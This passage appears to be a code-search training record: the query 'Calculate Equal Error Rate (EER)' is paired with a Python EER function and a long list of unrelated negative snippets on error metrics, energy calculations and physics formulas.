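    return sum(pk_values) / len(pk_values) if pk_values else 0

if __name__ == "__main__":
    relevant = [1, 4, 5, 9]   # ground-truth items (illustrative assumption)
    ranked = [1, 2, 4, 7, 9]  # ranked predictions (illustrative assumption)
    print(pk(relevant, ranked, 3))   # 0.666..., since items 1 and 4 are in the top 3
    print(apk(relevant, ranked, 3))  # mean of p@1, p@2, p@3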
Calculate Equal Error Rate (EER).
def calculate_eer(y, y_score, pos=1):
    fpr, tpr, thresholds = roc_curve(y, y_score, pos_label=pos)
    eer = brentq(lambda x: 1. - x - interp1d(fpr, tpr)(x), 0., 1.)
    thresh = interp1d(fpr, thresholds)(eer)
    return eer, np.float(thresh)
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def calculate_hr_ee(self):\n\n # HR - resting HR = net HR\n net_hr = np.array([i - self.rest_hr if i is not None else None for i in self.df_epoch[\"HR\"]])\n\n # Sets values below 0% HRR (below resting HR) to 0\n net_hr[net_hr <= 0] = 0\n\n # Equation from Brage et al., 2004. Active EE in kJ/kg/min\n kj_kg_min = [.011 * (hr ** 2) + 5.82 * hr if hr is not None else None for hr in net_hr]\n\n # Converts kJ to kcal: relative EE (kcal/kg/min)\n kcal_kg_min = [k / 4.184 if k is not None else None for k in kj_kg_min]\n\n # Converts relative EE to absolute EE (kcal/min)\n kcal_min = [k * self.weight / 1000 if k is not None else None for k in kcal_kg_min]\n\n # kcals per epoch instead of per minute\n kcal_epoch = [k * (15 / 60) for k in kcal_min]\n\n total_ee = sum([i for i in kcal_epoch if not np.isnan(i)])\n print(\"-Total energy expenditure estimated from HR is {} kcal.\".format(int(total_ee)))\n\n self.df_epoch[\"HR_EE\"] = kcal_min", "def rae(self) -> float:\n return float(np.sum(self._ae()) / (np.sum(np.abs(self.true - np.mean(self.true))) + EPS))", "def diff_of_errors(self):\n self.e_of_e = self.azimuth_error - self.altitude_error\n return self.e_of_e", "def e(self):\n\n ylow = self.e_min\n yhigh = self._e\n\n xlow = 0\n xhigh = self.anneal_max\n\n steep_mult = 8\n\n steepness = steep_mult / (xhigh - xlow)\n offset = (xhigh + xlow) / 2\n midpoint = yhigh - ylow\n\n x = np.clip(self.avg_score, 0, xhigh)\n x = steepness * (x - offset)\n e = ylow + midpoint / (1 + np.exp(x))\n return e", "def compute_EER(self, FAR, FRR):\r\n print('Computing EER')\r\n distance = abs(FAR - FRR)\r\n min_distance = min(distance)\r\n idx = np.where(distance == min_distance)\r\n return np.mean((FAR[idx] + FRR[idx]) / 2)", "def test_epe_evaluate(self):\n epe_metric = EPE()\n epe_metric.process(self.data_batch, self.data_samples)\n epe = epe_metric.evaluate(1)\n self.assertAlmostEqual(epe['EPE'], 11.5355339)", "def calculate_energy_conservation_error(self):\n assert self.data is not None\n # calculate total energy at start and end of simulation\n energy_start = self.measure_total_energy(self.t0)\n energy_end = self.measure_total_energy(self.t1)\n \n # calculate accuracy\n error = abs(1.0 - energy_start/energy_end)\n \n return error", "def _calc_Em(self):\n return (self.parameters.E0 +\n self.x * sqrt2 * self.parameters.sigma * self.mt)", "def ivrmse(self):\n return (self.model_error_iv()**2).mean()**.5", "def e(self):\n if self._e is None:\n # self._e = self.distributions.uniform(0.3,0.33)\n # return self._e\n # max is set by q but also limited by users choice of e_max.\n res_a = 29.9*((self.j[0]/self.k[0])**(2/3))\n q = self.distributions.truncated_normal(self.q_c, self.q_w, res_a*(1-0.8), res_a*(1-0.001))\n self._e = 1 - q/res_a\n return self._e", "def erf(data):\n return _make.erf(data)", "def _calculate_measurement_error(self): \n \n # Calculate Hartmann Spot\n # FIXME what are factor_1, factor_2 ???\n factor_1, factor_2 = 206265*5.89e-7, 206265*6.5e-7\n term1, term2 = factor_1/self.actuator_spacing, factor_2/self.r0\n hartmann_spot = np.max([term1, term2])\n \n # Calculate SNR \n n_pix=4 # FIXME spreadsheet says not to change this idk why?\n sample_time = 1/(10*self.controller_frequency)\n brightness = (8.9e5)*10**((0-self.guide_star_mag)/2.5)\n n_photons = brightness*sample_time*((100*self.actuator_spacing)**2)\n snr = n_photons/np.sqrt(n_photons + n_pix*(self.sigma_readnoise)**2)\n\n # Calculate noise propagator \n degrees_of_freedom = np.round((np.pi/4) * 
(self.telescope_diameter/self.actuator_spacing)**2)\n factor_1, factor_2 = 0.0536, 0.0795 # FIXME WHAT THE HECK IS THIS\n if self.aperture == 'circular':\n factor_1, factor_2 = 0.0068, 0.0796\n noise_propagator = np.sqrt(2*(factor_1 + factor_2*np.log(degrees_of_freedom)))\n\n # Calculate close loop averaging\n controller_over_frame = 1/10\n close_loop_averaging = np.sqrt(2*controller_over_frame)*np.arctan(1/(2*controller_over_frame))\n sigma_measurement = noise_propagator * close_loop_averaging * (self.actuator_spacing*1e9) * (hartmann_spot/snr*4.84814e-6)\n self.sigma_measurement = sigma_measurement # in nm", "def eccentricAnomaly(e, M):\n E = M if e < 0.8 else math.pi\n \n F = E - e*math.sin(M) - M\n for i in range(100):\n E = E - F/(1.0-e*math.cos(E))\n F = E - e*math.sin(E) - M\n if math.fabs(F)<1e-16:\n break\n E = mod2pi(E)\n return E", "def compute_RMSE(e):\n \"\"\"Corresponds to sqrt(2*MSE)\"\"\"\n \n return np.sqrt(2*compute_MSE(e))", "def emissivity_profile(R):\n E = R**(-3.0)*(1 - (R_in/R)**(1.0/2.0))\n return E", "def get_E(self):\r\n return self.Real.E, self.Ideal.E", "def get_E(self):\r\n return self.Real.E, self.Ideal.E", "def calculate_error(self):\n \n delta = self.Y - self.T\n error = delta.dot(delta) / self.N\n error = format(error, '.5f')\n \n self.errors.append(error)", "def euler_error(Rd, Re):\n\n nd = Rd[:, 0]\n sd = Rd[:, 1]\n ad = Rd[:, 2]\n\n ne = Re[:, 0]\n se = Re[:, 1]\n ae = Re[:, 2]\n\n return 0.5 * (np.cross(ne, nd) + np.cross(se, sd) + np.cross(ae, ad)) # eqn 3.85", "def adjust_E(self, power):\n if self.pwr_in_tot:\n fac = power/self.pwr_in_tot\n else:\n fac = 1.0\n fac = min(1.01, fac)\n self.Ey = sqrt(fac)*self.Ey", "def test_exponential_answer(self):\r\n answer = 50\r\n correct_responses = [\r\n \"50\", \"50.0\", \"5e1\", \"5e+1\",\r\n \"50e0\", \"50.0e0\", \"500e-1\"\r\n ]\r\n incorrect_responses = [\"\", \"3.9\", \"4.1\", \"0\", \"5.01e1\"]\r\n\r\n for input_str in correct_responses:\r\n result = calc.evaluator({}, {}, input_str)\r\n fail_msg = \"Expected '{0}' to equal {1}\".format(\r\n input_str, answer\r\n )\r\n self.assertEqual(answer, result, msg=fail_msg)\r\n\r\n for input_str in incorrect_responses:\r\n result = calc.evaluator({}, {}, input_str)\r\n fail_msg = \"Expected '{0}' to not equal {1}\".format(\r\n input_str, answer\r\n )\r\n self.assertNotEqual(answer, result, msg=fail_msg)", "def energy(e: float) -> float:\n\n return (1/np.sqrt(2))*(gamma(-e/2+1/2)/(gamma(-e/2+3/4)))", "def mrae(self, benchmark: np.ndarray = None):\n return float(np.mean(np.abs(self._relative_error(benchmark))))", "def calcEout(model_type): \n b, v = calcStatistics(model_type)\n return b + v", "def get_e(self):\n return self.e_min + self.e_ * self.e_range", "def inrse(self) -> float:\n return float(np.sqrt(np.sum(np.square(self._error())) / np.sum(np.square(self.true - np.mean(self.true)))))", "def uncertainty_ee(self,e1,e2):\n # reco\n unc = (self._eleRecoWeight[(e1.pt(),e1.eta())][1]/self._eleRecoWeight[(e1.pt(),e1.eta())][0] + \\\n self._eleRecoWeight[(e2.pt(),e2.eta())][1]/self._eleRecoWeight[(e2.pt(),e2.eta())][0])**2\n # id-isolation\n unc += (self._eleIdIsoWeight[(e1.pt(),e1.eta())][1]/self._eleIdIsoWeight[(e1.pt(),e1.eta())][0] + \\\n self._eleIdIsoWeight[(e2.pt(),e2.eta())][1]/self._eleIdIsoWeight[(e2.pt(),e2.eta())][0])**2\n # trigger (approximate)\n unc += (abs(self._ele8TrgWeight[(e1.pt(),e1.eta())][0]*self._ele17TrgWeight[(e2.pt(),e2.eta())][1]+ \\\n self._ele17TrgWeight[(e1.pt(),e1.eta())][1]*self._ele8TrgWeight[(e2.pt(),e2.eta())][0]- \\\n 
self._ele17TrgWeight[(e1.pt(),e1.eta())][1]*self._ele17TrgWeight[(e2.pt(),e2.eta())][0]- \\\n self._ele17TrgWeight[(e1.pt(),e1.eta())][0]*self._ele17TrgWeight[(e2.pt(),e2.eta())][1])/ \\\n (self._ele8TrgWeight[(e1.pt(),e1.eta())][0]*self._ele17TrgWeight[(e2.pt(),e2.eta())][0]+ \\\n self._ele17TrgWeight[(e1.pt(),e1.eta())][0]*self._ele8TrgWeight[(e2.pt(),e2.eta())][0]- \\\n self._ele17TrgWeight[(e1.pt(),e1.eta())][0]*self._ele17TrgWeight[(e2.pt(),e2.eta())][0]))**2\n unc += ((self._ele8TrgWeight[(e1.pt(),e1.eta())][1]*self._ele17TrgWeight[(e2.pt(),e2.eta())][0]+ \\\n self._ele17TrgWeight[(e1.pt(),e1.eta())][0]*self._ele8TrgWeight[(e2.pt(),e2.eta())][1])/ \\\n (self._ele8TrgWeight[(e1.pt(),e1.eta())][0]*self._ele17TrgWeight[(e2.pt(),e2.eta())][0]+ \\\n self._ele17TrgWeight[(e1.pt(),e1.eta())][0]*self._ele8TrgWeight[(e2.pt(),e2.eta())][0]- \\\n self._ele17TrgWeight[(e1.pt(),e1.eta())][0]*self._ele17TrgWeight[(e2.pt(),e2.eta())][0]))**2\n #outcome\n return sqrt(unc)", "def calculate_wrist_ee(self):\n\n data = [i * (30 / 75) for i in self.df_epoch[\"LWrist\"]]\n\n # Modified equation from Powell et al. 2017. Removed resting component (constant = 1.15451)\n mets = [.022261 * i for i in data]\n\n # Converts METs to relative VO2 (mL O2/kg/min)\n r_vo2 = [3.5 * m for m in mets]\n\n # Converts relative VO2 to absolute VO2 (L O2/kg/min)\n a_vo2 = [i * self.weight / 1000 for i in r_vo2]\n\n # Converts absolute VO2 to kcal/min (assumes 1 L O2 -> 4.825 kcal)\n kcal_min = [a * 4.825 for a in a_vo2]\n\n # Calculates kcal/epoch\n kcal_epoch = [k * (15 / 60) for k in kcal_min]\n\n total_ee = sum([i for i in kcal_epoch if not np.isnan(i)])\n print(\"-Total energy expenditure estimated from Wrist is {} kcal.\".format(int(total_ee)))\n\n self.df_epoch[\"Wrist_EE\"] = kcal_min", "def E(self, dstrct):\n rep_votes = dstrct.rep_votes + self.properties['sen_red']\n dem_votes = dstrct.dem_votes + self.properties['sen_blue']\n\n thresh = threshold(rep_votes+dem_votes)\n rep_wasted = wasted_votes(rep_votes, thresh)\n dem_wasted = wasted_votes(dem_votes, thresh)\n gap = (rep_wasted - dem_wasted)/(rep_votes + dem_votes)\n score = 1-abs(gap)\n\n self.E_ = self.w_E * score\n return self.E_", "def rmse(self):\n return (self.model_error()**2).mean()**.5", "def E(self):\n return self.generic_getter(get_energy, \"E\", \"convert_energy\")", "def get_error_rates():\n return [ERR_RT * i for i in range(int((1 / ERR_RT) / 4))] # error up to 25%", "def ErrorCorrect(val,fEC):\n return val * fEC", "def compute_MSE(e):\n\n return 1/2*np.mean(e**2)", "def get_R_e(E, M, g_e, T_e):\n # transform energy-vector into matrices\n mat_E_x, mat_E_y = np.meshgrid(E,E) \n mat_diff = mat_E_y - mat_E_x # matrix representing: E_i - E_j\n R_e = np.ones((M,M))*g_e**2 * T_e # matrix for transition rates\n ind = np.abs(mat_diff) > 0 # indices of the non-divergent elements\n # fill in just those elements without divergences 1/0\n # the rest is set to the correct limit\n R_e[ind] = g_e**2 * mat_diff[ind]/(np.exp(mat_diff[ind]/T_e)-1)\n return R_e", "def calculate_exponent():\n pass", "def mean_error(self) -> float:\n self.ME = sum(np.array(self.sim_data[\"Human (mean)\"]) - np.array(self.sim_data[\"assigned_sim\"])) / len(self.sim_data)\n return self.ME", "def calculate_mse(e):\r\n return 1/2*np.mean(e**2)", "def rrse(self) -> float:\n return float(np.sqrt(self.rse()))", "def error(self, trainset: ([], [])):\n # MSE = Σ | d – y |^2 / n\n error_sum = 0.0\n for index, example in enumerate(trainset):\n # | d – y |^2\n output = self.activate(example[0])\n\n 
target = example[1][0]\n\n error = target - output\n error_sum += error ** 2\n\n # Σ |error_sum| / n\n error_sum = error_sum / len(trainset)\n return error_sum", "def energy(self):\n e = 0\n\n restoration = RestorationModel(self.graph_damaged)\n restoration.run(self.state)\n restoration_graphs = restoration.get_restoration_graphs()\n restoration_times = restoration.get_restoration_times()\n restoration_costs = restoration.get_restoration_costs()\n\n damaged = []\n damaged.append(get_delta(self.no_damage, self.initial_damage))\n\n sim_results = Parallel(n_jobs=4)(delayed(parallel_model)(\n graph, self.od_graph, self.od_matrix) for graph in restoration_graphs[:-1])\n for values in sim_results:\n damaged.append(get_delta(self.no_damage, values))\n\n for idx, values in enumerate(damaged):\n dt = restoration_times[idx] if idx == 0 else restoration_times[idx] - \\\n restoration_times[idx-1]\n e += sum(restoration_costs[idx]) + dt * (self.day_factor * values[2] * np.sum(self.mu*self.xi) +\n values[3] * np.sum(self.mu * (self.nu * self.F_w + self.rho)) + values[4] * self.upsilon)\n with open(self.fdir+'energy.csv', 'a') as f:\n f.write('\\n'+str(e))\n\n return e", "def Eee(h_in, h_out, neutron_spectrum):\n h_out.Scale(0.098)\n neutron_spectrum.Add(h_in, 1)\n neutron_spectrum.Add(h_out, -1)\n neutron_spectrum.Fit('gaus')\n #neutron_spectrum.Draw()\n #input()\n results_fit = neutron_spectrum.GetFunction('gaus')\n mean_energy = results_fit.GetParameter(1)\n spread_energy = results_fit.GetParError(1)\n return mean_energy, spread_energy", "def _Ep(self):\n return np.logspace(np.log10(self.Epmin.to('GeV').value),np.log10(self.Epmax.to('GeV').value),\n self.nEpd * (np.log10(self.Epmax/self.Epmin)))", "def eccentricity(self):\n return self.b / self.a", "def delta_energy(atom,layer1,layer2):\n global r,c,h\n return float('%.2E' % Decimal(str(r*((atom**2/layer1**2)-(atom**2/layer2**2)))))", "def calculateErrorRate(numCorrect, numWrong):\n return np.round((numWrong)/(numCorrect+numWrong),3)", "def mbe(self) -> float:\n return float(np.mean(self._error(self.true, self.predicted)))", "def erf(x):\n return 0.0", "def E_fermi(n_e):\n return n_e / nu0 # in K", "def Hydrogen_Rate(E):\n\treturn (4.0/E)*np.exp(-(2.0/3.0)/E)", "def calculate_improved_euler(self, delta_time=0.02, iterations=100):\n predator_history = []\n prey_history = []\n print self.predators\n print self.prey\n predator_history.append(self.predators)\n prey_history.append(self.prey)\n print predator_history\n print prey_history\n harvesting_effort_history = []\n print self.prey\n for i in range(iterations):\n xk_1 = self.prey_change(self.prey, self.predators) * delta_time\n yk_1 = self.predator_change(self.prey, self.predators) * delta_time\n xk_2 = self.prey_change(self.prey + xk_1, self.predators + yk_1) * delta_time\n yk_2 = self.predator_change(self.prey + xk_1, self.predators + yk_1) * delta_time\n\n\n self.prey = self.prey_change(self.prey, self.predators)\n self.predators = self.predator_change(self.prey, self.predators)\n\n predator_history.append(self.predators)\n prey_history.append(self.prey)\n\n return {'predator': predator_history, 'prey': prey_history}", "def calc_ema(self):\n emaFactor = self.settings['emaFactor']\n stepFactor = emaFactor ** self.vars['dt']\n if self.vars['step'] == 0:\n ema = float('NaN')\n elif self.vars['step'] == 1:\n ema = self.vars['speed_trace'][1]\n else:\n ema = stepFactor * self.vars['ema_trace'][self.vars['step'] - 1] + (\n 1 - stepFactor)*self.vars['speed_trace'][self.vars['step']]\n return ema", "def 
energy(self):\n nocc, gmo, e = self.nocc, self.gmo, self.e\n\n Ec = 0.0\n for i in range(nocc):\n for j in range(nocc):\n for a in range(nocc, len(e)):\n for b in range(nocc, len(e)):\n Ec += (1/4.0) * gmo[i, j, a, b]**2 / (e[i]+e[j]-e[a]-e[b])\n\n self.Ec = Ec\n self.E_mp2 = Ec + self.E_scf\n\n print('@MP2 correlation energy: {:15.10f}\\n'.format(self.Ec))\n print('@Total MP2 energy: {:15.10f}\\n'.format(self.E_mp2))\n\n return self.E_mp2", "def test_mcintosh_e(self):\n c = array([1,2,3,1])\n num = sqrt(15)\n den = sqrt(19)\n exp = num/den\n self.assertEqual(mcintosh_e(c), exp)", "def energy_atom(atom,layer):\n global r,c,h\n backval= r*((atom**2/layer**2))\n return float('%.2E' % Decimal(str(backval)))", "def _emiss_ep(self,Eph):\n if self.weight_ep == 0.0:\n return np.zeros_like(Eph)\n\n gam = np.vstack(self._gam)\n eps = (Eph / mec2).decompose().value\n # compute integral with electron distribution\n emiss = c.cgs * trapz_loglog(np.vstack(self._nelec) * self._sigma_1(gam,eps),\n self._gam, axis=0).to(u.cm**2 / Eph.unit)\n return emiss", "def eccentricity(self):\n new_data = self._data[['pl_pnum', 'pl_orbper', 'pl_orbsmax',\n 'pl_masse', 'pl_orbeccen',\n 'pl_radj', 'pl_dens', 'st_teff',\n 'st_mass', 'st_rad']]\n new_data = new_data.dropna()\n\n features = new_data[['pl_pnum', 'pl_orbper', 'pl_orbsmax',\n 'pl_masse',\n 'pl_radj', 'pl_dens', 'st_teff',\n 'st_mass', 'st_rad']]\n labels = new_data['pl_orbeccen']\n\n features_train, features_test, labels_train, labels_test = \\\n train_test_split(features, labels, test_size=0.2)\n\n # Create an untrained model\n model = DecisionTreeRegressor()\n\n # Train it on the **training set**\n model.fit(features_train, labels_train)\n\n # Compute test accuracy\n test_predictions = model.predict(features_test)\n test_acc = mean_absolute_error(labels_test, test_predictions)\n test_acc_r2 = r2_score(labels_test, test_predictions)\n\n # Plot ML vs Actual\n fig, [ax1, ax2] = plt.subplots(2, figsize=(15, 12))\n\n sns.distplot(test_predictions, kde=False, ax=ax1)\n sns.distplot(labels_test, kde=False, ax=ax2)\n\n ax1.set_title('Distribution of Predicted Eccentricities of Orbits')\n ax1.set_xlabel('Eccentricity of Orbit')\n ax1.set_ylabel('Number of Planets')\n\n ax2.set_title('Distribution of Actual Eccentricities of Orbits')\n ax2.set_xlabel('Eccentricity of Orbit')\n ax2.set_ylabel('Number of Planets')\n\n plt.savefig('figures/ML_Eccentricity.png', bbox_inches='tight')\n\n return (test_acc, test_acc_r2)", "def error_compute(self):\n self.tt_error = np.linalg.norm(self.rel_error)\n if self.global_rank==0:print('Overall error is::',self.tt_error)\n return {'NMF': self.rel_error, 'tt': self.tt_error}", "def get_E(self):\n return self.E", "def energy(self):\n nocc, ntot, gmo, e = self.nocc, self.ntot, self.gmo, self.e\n\n Ec = 0.0\n for i in range(nocc):\n for j in range(nocc):\n for a in range(nocc, ntot):\n for b in range(nocc, ntot):\n Ec += gmo[i, a, j, b]*(2*gmo[i, a, j, b] - gmo[i, b, j, a])/\\\n (e[i] + e[j] - e[a] - e[b])\n\n self.Ec = Ec\n self.E_mp2 = Ec + self.E_scf\n\n print('@MP2 correlation energy: {:15.10f}\\n'.format(self.Ec))\n print('@Total MP2 energy: {:15.10f}\\n'.format(self.E_mp2))\n\n return self.E_mp2", "def adjacent_error(self, field, exclude=False):\n\n self.log.info('Running the adjacent error computation for quantity %s', field)\n # If we need to exclude calculate the indices\n if exclude:\n start, end = self.get_slice(self.sims[0])\n excluded = '_excluded'\n else:\n start = 0\n end = None\n excluded = ''\n base = 
self.sims[0].conf['General']['results_dir']\n errpath = os.path.join(base, 'adjacenterror_%s%s.dat' % (field, excluded))\n with open(errpath, 'w') as errfile:\n self.log.info('Computing adjacent error for sweep %s', base)\n # For all other sims in the groups, compare to best estimate\n # and write to error file\n for i in range(1, self.num_sims):\n # Set reference sim\n ref_sim = self.sims[i]\n # Get the comparison vector\n vecs1, normvec = self.get_comp_vec(ref_sim, field, start, end)\n sim2 = self.sims[i - 1]\n vecs2, normvec2 = self.get_comp_vec(sim2, field, start, end)\n self.log.info(\"Computing adjacent error between numbasis %i and numbasis %i\",\n ref_sim.conf['Simulation'][ 'params']['numbasis'],\n sim2.conf['Simulation']['params']['numbasis'])\n # Get the array containing the magnitude of the difference vector at each point\n # in space\n mag_diff_vec = self.diff_sq(vecs1, vecs2)\n # Check for equal lengths between norm array and diff mag\n # array\n if len(mag_diff_vec) != len(normvec):\n self.log.error(\"The normalization vector has an incorrect number of elements!!!\")\n raise ValueError\n # Error as a percentage should be thkkk square root of the ratio of sum of mag diff vec\n # squared to mag efield squared\n error = np.sqrt(np.sum(mag_diff_vec) / np.sum(normvec))\n # self.log.info(str(error))\n errfile.write('%i,%f\\n' % (sim2.conf['Simulation']['params']['numbasis'], error))\n sim2.clear_data()\n ref_sim.clear_data()", "def _emiss_ee(self,Eph):\n if self.weight_ee == 0.0:\n return np.zeros_like(Eph)\n\n gam = np.vstack(self._gam)\n # compute integral with electron distribution\n emiss = c.cgs * trapz_loglog(np.vstack(self._nelec) * self._sigma_ee(gam,Eph),\n self._gam, axis=0)\n return emiss", "def computeEnergy(self):\n\t\tGmo = self.Gmo\n\t\te = self.e\n\t\tself.Ec = 0.0\n\n\t\tfor i in range( self.nocc ):\n\t\t\tfor j in range( self.nocc ):\n\t\t\t\tfor a in range( self.nocc,self.norb ):\n\t\t\t\t\tfor b in range( self.nocc,self.norb ):\n\t\t\t\t\t\tself.Ec += 0.25*(Gmo[i,j,a,b]*Gmo[a,b,i,j])/(e[i]+e[j]-e[a]-e[b])\n\n\t\treturn self.E0 + self.Ec", "def error_rate(dataset, estimates):\n\tincorrect = 0.0\n\tcount = 0.0\n\n\tfor idx in range(len(estimates)):\n\t\testimate = estimates[idx]\n\t\t_, actual = dataset[idx]\n\t\tfor e, a in zip(estimate, actual):\n\t\t\tcount += 1.0\n\t\t\tif e != a:\n\t\t\t\tincorrect += 1.0\n\t\n\treturn incorrect / count", "def mbrae(self, benchmark: np.ndarray = None) -> float:\n return float(np.mean(self._bounded_relative_error(benchmark)))", "def Er( z, r, epsilon, k0, w0, wp, t) :\n Er_array = \\\n epsilon * m_e*c**2/e * 2*r/w0**2 * \\\n np.exp( -r**2/w0**2 ) * np.sin( k0*z ) * np.sin( wp*t )\n return( Er_array )", "def MSE_one_error(real,estimate):\n error = mean_squared_error(real.T, estimate.T)\n return error", "def Eee2(neutron_spectrum):\n neutron_spectrum.Fit('gaus')\n results_fit = neutron_spectrum.GetFunction('gaus')\n mean_energy = results_fit.GetParameter(1)\n spread_energy = results_fit.GetParError(1)\n return mean_energy, spread_energy", "def pair_energy(self,e, s, r):\n return 4.0*e*((s/r)**12-(s/r)**6)", "def get_error_estimates(self, Y, M1, M2=None):\n # First K0 and K1\n Mminus = M1\n if M2 is None:\n Mplus = M1\n else:\n Mplus = M2\n if self.Cp0 != 0 and self.Cp1 != 0 and self.Cm != 0:\n Cp0 = self.Cp0\n Cp1 = self.Cp1\n Cm = self.Cm\n else:\n PP = self.principal_part()\n Cmax = max(PP.values())\n Kmax = 0\n for t in PP.keys():\n if isinstance(t, tuple):\n (c, l) = t\n elif isinstance(t, (int, Integer)):\n (c, l) = 
rn_from_D(self._space.multiplier(), t)\n else:\n raise ValueError(\"Incorrect principal part: t={0}\".format(t))\n if c in self._space.multiplier().D():\n tmp = l + self._space.multiplier().Qv[self._space.index_set().index(c)]\n elif c in range(len(self._space.multiplier().Qv)):\n tmp = l + self._space.multiplier().Qv[c]\n else:\n raise ValueError(\"Incorrect principal part: c,l={0},{1}\".format(c, l))\n if(abs(tmp) > Kmax):\n Kmax = abs(tmp)\n [Cp0, Cp1] = self._space.get_Cp(Cmax)\n Cm = self._space.get_Cm(Kmax, Cmax)\n self.Cp0 = Cp0\n self.Cp1 = Cp1\n self.Cm = Cm\n\n fak = len(self._space.index_set())\n # print \"Cp0,Cp1,Cm=\",Cp0,Cp1,Cm\n # print \"fak=\",fak\n\n er1 = fak * self._space.err_est_vv_hwmf_neg(Y, Mminus, Cm)\n er2 = fak * self._space.err_est_vv_hwmf_pos(Y, Mplus, Cp0, Cp1)\n return [er1, er2]", "def energy(self, r):\n sigma = self.params['sigma']\n epsilon = self.params['epsilon']\n s = sigma / r\n s6 = s**6; s12 = s6 * s6\n pot = 4.0 * epsilon * (s12 - s6)\n return pot", "def gmrae(self, benchmark: np.ndarray = None) -> float:\n return _geometric_mean(np.abs(self._relative_error(benchmark)))", "def E(self):\n return self._E", "def E(self):\n return self._E", "def dependent_error_exp(data, weak_signal_data, num_weak_signal):\n\n w_model = train_weak_signals(data, weak_signal_data, num_weak_signal)\n\n training_data = data['training_data'][0].T\n training_labels = data['training_data'][1]\n val_data, val_labels = data['validation_data']\n val_data = val_data.T\n test_data = data['test_data'][0].T\n test_labels = data['test_data'][1]\n\n num_features, num_data_points = training_data.shape\n\n weak_signal_ub = w_model['error_bounds']\n weak_signal_probabilities = w_model['probabilities']\n weak_test_accuracy = w_model['test_accuracy']\n\n weights = np.zeros(num_features)\n\n print(\"Running tests...\")\n\n optimized_weights, ineq_constraint = train_all(val_data, weights, weak_signal_probabilities, weak_signal_ub, max_iter=5000)\n\n # calculate test probabilities\n test_probabilities = probability(test_data, optimized_weights)\n # calculate test accuracy\n test_accuracy = getModelAccuracy(test_probabilities, test_labels)\n\n print(\"\")\n print(\"+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++\")\n print(\"Experiment %d\"%num_weak_signal)\n print(\"We trained %d learnable classifiers with %d weak signals\" %(1, num_weak_signal))\n print(\"The accuracy of the model on the test data is\", test_accuracy)\n print(\"The accuracy of weak signal(s) on the test data is\", weak_test_accuracy)\n print(\"\")\n\n # calculate ge criteria\n print(\"Running tests on ge criteria...\")\n model = ge_criterion_train(val_data.T, val_labels, weak_signal_probabilities, num_weak_signal)\n ge_test_accuracy = accuracy_score(test_labels, np.round(probability(test_data, model)))\n print(\"The accuracy of ge criteria on test data is\", ge_test_accuracy)\n print(\"+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++\")\n\n # calculate baseline\n print(\"Running tests on the baselines...\")\n baselines = runBaselineTests(val_data, weak_signal_probabilities)\n b_test_accuracy = getWeakSignalAccuracy(test_data, test_labels, baselines)\n print(\"The accuracy of the baseline models on test data is\", b_test_accuracy)\n print(\"\")\n\n output = {}\n output['ALL'] = test_accuracy\n output['WS'] = w_model['test_accuracy'][-1]\n output['GE'] = ge_test_accuracy\n output['AVG'] = 
b_test_accuracy[-1]\n\n return output", "def get_E(self):\r\n return self.E", "def E(self):\n\n print(\"\", file=self.logfile)\n print(\"Updating R\", file=self.logfile)\n\n\n TAE = toeplitz(self.A*self.e2[:self.P+1], np.zeros(self.P+1))\n TA = toeplitz(self.A, np.zeros(self.P+1))\n M = np.dot(TAE.transpose(), TA)\n res = toeplitz(np.concatenate([M[:,0], np.zeros((self.L_h-self.P-1))]),\n np.concatenate([M[0,:], np.zeros((self.L_h-self.P-1))]))\n res[-self.P:, -self.P:] = M[1:,1:]\n res = res*np.array([self.e2]).transpose()\n self.R = self.la*self.sigma2*np.linalg.inv(self.la*np.eye(self.L_h) + self.sigma2*res)\n\n\n\n print(\"\", file=self.logfile)\n print(\"Updating mu\", file=self.logfile)\n self.mu = np.dot(self.R, self.h)/self.sigma2\n\n\n # Propagate\n self._propagate_mu()\n self._propagate_R()", "def calcEVals(self):\n self.eVals,self.eVecs = np.linalg.eigh(self.rhoOp)", "def test_calc_baseline_error_to_observed_error(self):\r\n exp_ratio = calc_baseline_error_to_observed_error(\r\n self.baseline_error_input,\r\n self.obs_error_input)\r\n self.assertEqual(self.ratio_result, exp_ratio)", "def errorEMat(E1, E2):\n E1_normalized = E1 / E1[2][2];\n E2_normalized = E2 / E2[2][2];\n return torch.norm(E1_normalized - E2_normalized)", "def energy_func(self):\n i = self.inl[0].to_flow()\n o = self.outl[0].to_flow()\n\n T_m = (T_mix_ph(i, T0=self.inl[0].T.val_SI) +\n T_mix_ph(o, T0=self.outl[0].T.val_SI)) / 2\n\n return (i[0] * (o[2] - i[2]) -\n self.A.val * (\n self.E.val * self.eta_opt.val -\n (T_m - self.Tamb.val_SI) * self.lkf_lin.val -\n self.lkf_quad.val * (T_m - self.Tamb.val_SI) ** 2))", "def calcError(self, inherited_error):\r\n\t\tif inherited_error == None:\t\t# output neurons\r\n\t\t\tself.error = (self.target - self.value) * self.activate_der()\r\n\t\telse:\r\n\t\t\tself.error = inherited_error * self.activate_der()", "def evaluate_acc_eer(net, data_loader):\n correct = 0\n total = 0\n net.reset()\n target_scores = []\n non_target_scores = []\n for data in tqdm(data_loader):\n sample_input, output = data[0], data[1]\n sample_input = whiten(sample_input)\n mask, score = gate_activation(net, sample_input)\n selected_score = score[mask]\n if selected_score.size == 0:\n xo = 0.5\n else:\n xo = np.sum(selected_score) / selected_score.size\n total += 1\n correct += ((xo > 0.5) == output)\n if output == 1:\n target_scores.append(xo)\n else:\n non_target_scores.append(xo)\n\n target_scores = np.array(target_scores)\n non_target_scores = np.array(non_target_scores)\n\n pmiss, pfa = rocch(target_scores, non_target_scores)\n eer = rocch2eer(pmiss, pfa)\n\n return float(correct) / total, eer", "def energy_func(self):\n i = self.inl[0].to_flow()\n o = self.outl[0].to_flow()\n\n T_m = (T_mix_ph(i, T0=self.inl[0].T.val_SI) +\n T_mix_ph(o, T0=self.outl[0].T.val_SI)) / 2\n\n iam = (\n 1 - self.iam_1.val * abs(self.aoi.val) -\n self.iam_2.val * self.aoi.val ** 2)\n\n return (i[0] * (o[2] - i[2]) -\n self.A.val * (\n self.E.val * self.eta_opt.val * self.doc.val ** 1.5 * iam -\n (T_m - self.Tamb.val_SI) * self.c_1.val -\n self.c_2.val * (T_m - self.Tamb.val_SI) ** 2))", "def calc_error(y_real, y_pred):\n if len(y_real) > 0:\n curr_err = rmse(y_pred, y_real)\n else:\n curr_err = np.nan\n return curr_err", "def eccentricity(self):\n return 